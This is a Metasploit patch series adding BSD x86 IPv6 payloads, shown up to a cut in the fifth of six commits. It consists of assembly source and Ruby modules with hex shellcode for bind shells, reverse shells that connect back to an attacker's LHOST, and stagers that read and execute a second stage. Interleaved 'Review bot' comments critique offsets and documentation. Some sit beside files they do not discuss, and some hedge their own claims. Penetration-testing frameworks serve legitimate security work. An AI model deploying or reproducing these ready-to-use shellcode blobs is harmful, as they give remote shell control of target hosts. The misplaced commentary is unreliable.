From 7630ef17e33ae5888889a8615998a3e90ebc46a8 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:34:31 -0600 Subject: [PATCH 1/6] Add BSD IPv6 payloads (source only for now) --- external/source/shellcode/bsd/ia32/Makefile | 4 +- .../bsd/ia32/single_bind_tcp_shell_ipv6.asm | 36 ++++++ .../ia32/single_reverse_tcp_shell_ipv6.asm | 42 +++++++ .../bsd/ia32/stager_sock_bind_ipv6.asm | 108 ++++++++++++++++++ .../bsd/ia32/stager_sock_reverse_ipv6.asm | 95 +++++++++++++++ 5 files changed, 283 insertions(+), 2 deletions(-) create mode 100644 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm diff --git a/external/source/shellcode/bsd/ia32/Makefile b/external/source/shellcode/bsd/ia32/Makefile index be00e42cd3..71c7e56332 100644 --- a/external/source/shellcode/bsd/ia32/Makefile +++ b/external/source/shellcode/bsd/ia32/Makefile @@ -1,7 +1,7 @@ ASM=nasm -STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse +STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6 STAGES=stage_tcp_shell -SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock +SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6 OBJS=${STAGERS} ${STAGES} ${SINGLE} include ../../Makefile.incl diff --git a/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..484d240008 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm 
@@ -0,0 +1,36 @@ +;; +; +; Name: single_bind_tcp_shell +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single portbind TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Shell +; meta-description=Listen on a port and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=bind +; meta-name=bind_tcp_shell +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=0x8 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 + +%include "generic.asm" +%include "stager_sock_bind_ipv6.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..5b1d635428 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm 
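Review bot: The header metadata in this new file was copied from the IPv4 single and no longer describes the code it wraps: `meta-offset-lport=0x8` disagrees with the included `stager_sock_bind_ipv6.asm`, whose own header says `meta-offset-lport=26` (the `0xbfbf` port bytes inside `push dword 0xbfbf1c1c` land at offset 26, which is also what the Ruby module uses), and `Name:` / `meta-name` still read `single_bind_tcp_shell` / `bind_tcp_shell` with no IPv6 marker. Anyone regenerating offsets from these headers would patch the wrong bytes. I would change the lines to `; Name: single_bind_tcp_shell_ipv6`, `; meta-name=bind_tcp_shell_ipv6` and `; meta-offset-lport=26`, and make the Description say `; Single portbind TCP shell over IPv6.` so the file is self-describing.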
@@ -0,0 +1,42 @@ +;; +; +; Name: single_reverse_tcp_shell +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single reverse TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Shell +; meta-description=Connect back to the attacker and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=reverse +; meta-name=reverse_tcp_shell +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=0x0a +; meta-offset-lport=0x13 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 +%define ASSUME_REG_EAX 0 + +; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD +; clears edx. +; %define ASSUME_REG_EDX 2 + +%include "stager_sock_reverse_ipv6.asm" +%include "generic.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm new file mode 100644 index 0000000000..196328405e --- /dev/null +++ b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm 
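Review bot: `meta-offset-lhost=0x0a` and `meta-offset-lport=0x13` are the IPv4 single's values; the included `stager_sock_reverse_ipv6.asm` declares the port at 36 and a 16-byte address plus a scope id much further in, so this header points at the wrong bytes and has no `meta-offset-scope` line at all. `%define ASSUME_REG_EAX 0` also looks inherited: the IPv6 stager starts with an unconditional `xor eax, eax`, so the define appears to have no effect here unless generic.asm consumes it (not visible in this diff). I would sync the three offsets with whatever the stager header declares, add `; meta-offset-scope=`, and rename `meta-name=reverse_tcp_shell` to `reverse_tcp_shell_ipv6`; if ASSUME_REG_EAX really is dead, drop it rather than leave a misleading hint about register state.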
@@ -0,0 +1,108 @@ +;; +; +; Name: stager_sock_bind_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD portbind over IPv6 TCP stager. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Stager +; meta-description=Listen on a port for a connection and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=bind +; meta-name=bind_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=26 +;; +BITS 32 +GLOBAL main + +main: + +socket: + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + mov ebx, eax ; save socket + + xor edx, edx + + push edx ; uint32_t sin6_scope_id; /* scope zone index */ + push edx ; struct in6_addr sin6_addr; /* IP6 address */ + push edx + push edx + push edx + push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */ + push dword 0xbfbf1c1c + ; in_port_t sin6_port; /* Transport layer port # */ + ; uint8_t sin6_len; /* length of this struct */ + ; sa_family_t sin6_family; /* AF_INET6 */ + + mov ecx, esp + +bind: + push byte 28 + push ecx + push eax + push byte 104 + pop eax + push eax ; padding + int 0x80 + +listen: + mov al, 106 + int 0x80 + +accept: + push edx + push ebx +%ifndef USE_SINGLE_STAGE + mov dh, 0x10 +%endif + push edx + mov al, 30 + int 0x80 + +%ifndef USE_SINGLE_STAGE + +read: + push ecx + push eax + push ecx +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + push byte 0x3 + pop eax + int 0x80 + ret + +%else + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + +%endif 
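Review bot: `push byte 28 ; Domain: (PF_INET6=28)` and the `0x1c` family byte in `push dword 0xbfbf1c1c` hard-code FreeBSD's AF_INET6 value while the header, Makefile and Ruby module present this as a generic `bsd` payload; as far as I recall NetBSD and OpenBSD define AF_INET6 as 24, in which case socket() fails with EAFNOSUPPORT there and the stager never gets to bind — worth confirming and stating, e.g. `; NOTE: 28 is AF_INET6 on FreeBSD only (NetBSD/OpenBSD use 24)` next to the Domain push and in the Description. Separately, the two-stage path performs a single read(): `mov dh, 0x10` makes the value pushed into accept()'s return-address slot become read()'s length (0x1000), and the `ret` then jumps into the buffer regardless of how many bytes eax says actually arrived, so a stage larger than 4 KiB or one delivered in more than one TCP segment executes truncated. None of the syscalls checks the carry flag either, which is a normal size trade-off but should be written down. I would put `; single read() of at most 0x1000 bytes, no length check: the stage must arrive whole in one segment` at `read:` so whoever pairs this stager with a larger stage sees the constraint.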
diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
new file mode 100644
index 0000000000..8a181d4b65
--- /dev/null
+++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
@@ -0,0 +1,95 @@ +;; +; +; Name: stager_sock_reverse_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD reverse TCP stager over IPv6 +; +; File descriptor in edi. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Stager +; meta-description=Connect back to the framework and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=reverse +; meta-name=reverse_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=43 +; meta-offset-lport=36 +; meta-offset-scope=59 +;; +BITS 32 +GLOBAL main + +main: + +socket: + + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + jmp short bounce_to_connect + +connect: + pop ecx + push byte 28 + push ecx + push eax + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + + push byte 98 + pop eax + push eax ; padding + int 0x80 + + jmp short skip_bounce + +bounce_to_connect: + call connect + +ipv6_address: + db 28 ; uint8_t sin6_len; /* length of this struct */ + db 28 ; sa_family_t sin6_family; /* AF_INET6 */ + dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ + dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ + dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ + dd 0x48474645 + dd 0x4d4b4a49 + dd 0x51504f4e + dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ + +skip_bounce: + +%ifndef USE_SINGLE_STAGE + +read: + mov al, 0x3 + mov byte [ecx - 0x3], 0x10 + int 0x80 + ret + +%endif From 45a785fde0d5e0a5a62640cb330e80e4ebef8a47 Mon Sep 17 00:00:00 2001 
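Review bot: Nothing examines connect()'s outcome: after `int 0x80` eax holds 0 or an errno and the carry flag signals failure, but the code falls straight into `read:` where `mov al, 0x3` overwrites eax, so a refused or unroutable connection proceeds to read() on an unconnected socket and then `ret`s on whatever that returns — presumably a deliberate size trade-off, but it deserves a one-line comment at `connect:` (`; connect() result is not checked: failure falls through to read()`). The header's `; File descriptor in edi.` is only true for the default build; under `%ifdef FD_REG_EBX` the `xchg eax, ebx` path leaves the socket in ebx, so `; File descriptor in edi (ebx when FD_REG_EBX is defined).` is the accurate statement. As in the bind stager, the `28` pushed as the domain and stored in `sin6_family` is FreeBSD's AF_INET6 (I believe NetBSD/OpenBSD use 24), and `meta-shortname=BSD Reverse TCP Stager` never mentions IPv6; both are worth fixing in the header since the module is published for `bsd` as a whole.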
From: HD Moore Date: Wed, 1 Feb 2012 00:53:09 -0600 Subject: [PATCH 2/6] Adds BSD IPv6 payloads and stagers --- external/source/shellcode/Makefile.incl | 5 +- .../singles/bsd/x86/shell_bind_tcp_ipv6.rb | 52 +++++++++++++++ .../singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 57 ++++++++++++++++ .../payloads/stagers/bsd/x86/bind_ipv6_tcp.rb | 58 +++++++++++++++++ .../stagers/bsd/x86/reverse_ipv6_tcp.rb | 65 +++++++++++++++++++ 5 files changed, 235 insertions(+), 2 deletions(-) create mode 100644 modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb create mode 100644 modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb create mode 100644 modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb create mode 100644 modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb diff --git a/external/source/shellcode/Makefile.incl b/external/source/shellcode/Makefile.incl index a79dced9e7..ef771e44b5 100644 --- a/external/source/shellcode/Makefile.incl +++ b/external/source/shellcode/Makefile.incl 
@@ -1,2 +1,3 @@
-BUILDASM=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
-BUILDASMBSD=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+BUILDASM=do echo -n "Building (ASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+
+BUILDASMBSD=do echo -n "Building (BSDASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb
new file mode 100644
index 0000000000..bf167da40a
--- /dev/null
+++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb
@@ -0,0 +1,52 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Bsd + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Bind TCP Inline (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection and spawn a command shell over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LPORT' => [ 26, 'n' ], + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" + + "\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" + + "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0" + + "\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" + + "\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" + + "\x54\x53\x53\xb0\x3b\xcd\x80 + + } + )) + end + +end diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb new file mode 100644 index 0000000000..06faffaa6c --- /dev/null +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb 
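Review bot: `'Description' => 'Listen for a connection and spawn a command shell over IPv6'` leaves out two things the operator needs: the sockaddr in the blob is all zeros apart from `\x1c\x1c\xbf\xbf`, so the listener binds the unspecified address `[::]:LPORT`, and on FreeBSD an AF_INET6 socket is v6-only by default (`net.inet6.ip6.v6only=1`, to be confirmed), so the BindTcp handler must reach RHOST over IPv6 — an IPv4 RHOST simply never connects. I would say so in the Description or a comment: `# Listens on [::]:LPORT; v6-only on FreeBSD's default v6only=1, so RHOST must be the target's IPv6 address`. The hex blob also carries no reference to what produced it; a `# Assembled from external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm` line above `'Payload'` lets a reviewer re-assemble and diff the bytes instead of trusting them.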
@@ -0,0 +1,57 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Bsd + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Reverse TCP Inline (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to attacker and spawn a command shell over IPv6', + 'Author' => [ 'skape', 'vlad902', 'hdm' ], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LHOST' => [ 43, 'ADDR' ], + 'LPORT' => [ 36, 'n' ], + 'SCOPEID' => [ 59, 'V' ] + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + + "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + + "\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" + + "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" + + } + )) + register_options([ + OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) + ]) + end + +end diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb new file mode 100644 index 0000000000..0739922712 --- /dev/null +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb 
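Review bot: `OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])` does not say whose interface index is meant: the value is patched into the `sin6_scope_id` field of the sockaddr that the *target* hands to connect(), so it has to be the interface index on the compromised host, not the attacker's — an operator who writes the handler's `%em0` scope here will get a silently failing connect. I would expand the option text to `"IPv6 scope ID (target-side interface index) for link-local LHOSTs"`. The opaque blob has no pointer to its source either; `# Assembled from external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm` above `'Payload'` would make the bytes auditable.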
@@ -0,0 +1,58 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/bind_tcp' + + +### +# +# BindTcp +# ------- +# +# BSD bind TCP stager. +# +### +module Metasploit3 + + include Msf::Payload::Stager + + def self.handler_type_alias + "bind_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Bind TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Stager' => + { + 'Offsets' => + { + 'LPORT' => [ 26, 'n' ], + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\x89\xc3\x31" + + "\xd2\x52\x52\x52\x52\x52\x52\x68\x1c\x1c\xbf\xbf\x89\xe1\x6a\x1c" + + "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\xb6\x10" + + "\x52\xb0\x1e\xcd\x80\x51\x50\x51\x97\x6a\x03\x58\xcd\x80\xc3" + } + )) + end + +end diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..cf7df3b93c --- /dev/null +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb 
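Review bot: The stager hands the accepted socket to the stage in edi (the `\x97` = `xchg eax, edi` in the blob, per the asm), but the module does not declare that contract; the existing IPv4 BSD stagers carry `'Convention' => 'sockedi'`, and if I remember the stage/stager compatibility check correctly a module with no convention matches everything, so a stage expecting the fd elsewhere would pair with this stager unnoticed — please confirm and add `'Convention' => 'sockedi',` next to `'Handler'`. The `###` block above `module Metasploit3` still reads `BindTcp` / `BSD bind TCP stager.`, copied from the IPv4 module; `# BSD bind TCP stager over IPv6 (listens on [::]:LPORT).` would be accurate. A `# Assembled from external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm` comment would also let the bytes be regenerated and compared.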
@@ -0,0 +1,65 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + + +### +# +# ReverseTcp +# ---------- +# +# BSD reverse TCP stager. +# +### +module Metasploit3 + + include Msf::Payload::Stager + + + def self.handler_type_alias + "reverse_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to the attacker over IPv6', + 'Author' => ['skape', 'vlad902', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'bsd', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ 43, 'ADDR' ], + 'LPORT' => [ 36, 'n' ], + 'SCOPEID' => [ 59, 'V' ] + }, + 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + + "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" + + "\xc6\x41\xfd\x10\xcd\x80\xc3" + } + )) + register_options([ + OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) + ]) + end + +end From aed27a2f82e130aa187faf56352f921d84bf40fc Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:54:29 -0600 Subject: [PATCH 3/6] Add missing trailing quote --- modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index bf167da40a..50005fb180 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb 
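Review bot: The `###` header copied from the IPv4 module (`ReverseTcp` / `BSD reverse TCP stager.`) is the only prose in the file and it does not mention IPv6, the SCOPEID option or that the fd is left in edi; `# BSD reverse TCP stager over IPv6. Socket fd is returned in edi; SCOPEID is the target-side interface index for link-local LHOSTs.` would cover what a reader needs. As with the bind stager, no `'Convention'` is declared even though the asm fixes the fd register, so the stage compatibility check has nothing to verify — `'Convention' => 'sockedi',` if that is the framework's key, to be confirmed. The blob has no provenance; `# Assembled from external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm` above `'Payload'` would let it be regenerated and diffed.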
+++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -43,7 +43,7 @@ module Metasploit3 "\x51\x50\x6a\x68\x58\x50\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0" + "\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" + "\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" + - "\x54\x53\x53\xb0\x3b\xcd\x80 + "\x54\x53\x53\xb0\x3b\xcd\x80" } )) From 29d8feaa24937c4e305d0da707eaf6c987c31345 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:58:08 -0600 Subject: [PATCH 4/6] Use the ADDR6 type, not ADDR --- modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 2 +- modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 06faffaa6c..8796b7acf9 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -35,7 +35,7 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR' ], + 'LHOST' => [ 43, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], 'SCOPEID' => [ 59, 'V' ] }, diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index cf7df3b93c..0e18bbd936 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -45,7 +45,7 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR' ], + 'LHOST' => [ 43, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], 'SCOPEID' => [ 59, 'V' ] }, From 0c2a18d765c526ba7c24b5c1355181dba1ce7e5c Mon Sep 17 00:00:00 2001 
From: HD Moore Date: Wed, 1 Feb 2012 01:41:24 -0600 Subject: [PATCH 5/6] Fix up reverse_tcp ipv6 stager for freebsd --- .../bsd/ia32/stager_sock_reverse_ipv6.asm | 33 ++++++++++++++----- .../singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 13 ++++---- .../stagers/bsd/x86/reverse_ipv6_tcp.rb | 12 ++++--- 3 files changed, 38 insertions(+), 20 deletions(-) diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm index 8a181d4b65..50071dc032 100644 --- a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm +++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm @@ -76,10 +76,10 @@ ipv6_address: db 28 ; sa_family_t sin6_family; /* AF_INET6 */ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ - dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ - dd 0x48474645 - dd 0x4d4b4a49 - dd 0x51504f4e + dd 0 ; struct in6_addr sin6_addr; /* IP6 address */ + dd 0 + dd 0 + dd 0x01000000 ; default to ::1 dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ skip_bounce: @@ -87,9 +87,26 @@ skip_bounce: %ifndef USE_SINGLE_STAGE read: - mov al, 0x3 - mov byte [ecx - 0x3], 0x10 - int 0x80 - ret + push byte 0x10 + pop edx + shl edx, 8 + sub esp, edx + mov ecx, esp ; Points to 4096 stack buffer + + push edx ; Length + push ecx ; Buffer + +%ifdef FD_REG_EBX + push ebx ; Socket +%else + push edi ; Socket +%endif + + push ecx ; Buffer to Return + + mov al, 0x3 + int 0x80 ; read(socket, &buff, 4096) + + ret ; Return %endif diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 8796b7acf9..2c548f85fd 100644 --- 